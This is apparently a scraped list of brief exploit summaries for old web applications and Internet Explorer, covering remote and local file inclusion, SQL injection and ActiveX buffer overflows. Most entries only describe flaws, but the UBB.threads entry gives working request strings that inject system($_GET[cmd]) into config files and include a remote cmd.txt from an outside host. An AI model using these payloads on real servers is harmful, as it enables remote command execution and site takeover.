Forum82 version v2.5.2b is vulnerable to multiple Remote File Inclusion (RFI) vulnerabilities. An attacker can exploit this vulnerability by sending a malicious URL in the repertorylevel parameter of the vulnerable script. This can allow the attacker to execute arbitrary code on the vulnerable system.
This exploit is a proof-of-concept for a buffer overflow vulnerability in Microsoft Internet Explorer WebViewFolderIcon setSlice() function. The exploit code is written in Perl and uses ActiveXObject to execute arbitrary code on the target system.
UBB.threads Multiple vulnerabilities exploit should allow you to execute commands. Tested on Version 6 (6.5.1.1) and other versions maybe affected. Remote File including ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir and ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir. Files overwrite vulnerabilities if magic_qoutes_gpc = off. Admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/theme.inc.php?cmd=ls -la or admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/config.inc.php?cmd=ls -la. If magic_qoutes_gpc = on admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt? and you will have a command execution files. Exploit: php '.$argv[0].' host Example: php '.$argv[0].' http://localhost/
This exploit allows an attacker to inject arbitrary SQL commands into a vulnerable web application. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'display.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable web application.
Tagmin Control Center 2.1.B is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability to include a remote file containing malicious code, resulting in a compromise of the vulnerable system.
A vulnerability exists in lesvisit (visiteurs) version 2.0, which allows a remote attacker to include arbitrary files from remote locations. This is due to a lack of sanitization of user-supplied input to the 'lvc_include_dir' parameter in the '/include/config.inc.php' script.
This exploit is a buffer overflow vulnerability in Microsoft Internet Explorer WebViewFolderIcon ActiveX control. It allows remote attackers to execute arbitrary code via a long argument to the setSlice method.
KGB 1.8+ is vulnerable to a Local File Inclusion vulnerability which allows an attacker to execute arbitrary code on the vulnerable server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'kgb.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable script. This can allow the attacker to include and execute arbitrary local files on the vulnerable server.
A-Blog v2.0 is vulnerable to a remote file include vulnerability. This vulnerability exists in the /navigation/links.php, /navigation/search.php, /navigation/donation.php, /navigation/latestnews.php, and /sources/myaccount.php files. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the vulnerable parameters. This can allow an attacker to execute arbitrary code on the vulnerable system.
A remote file inclusion vulnerability exists in Newswriter SW version 1.42. The vulnerability is due to the include/editfunc.inc.php script not properly sanitizing user-supplied input to the NWCONF_SYSTEM[server_path] parameter. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it in the context of the webserver process.
Services By CQR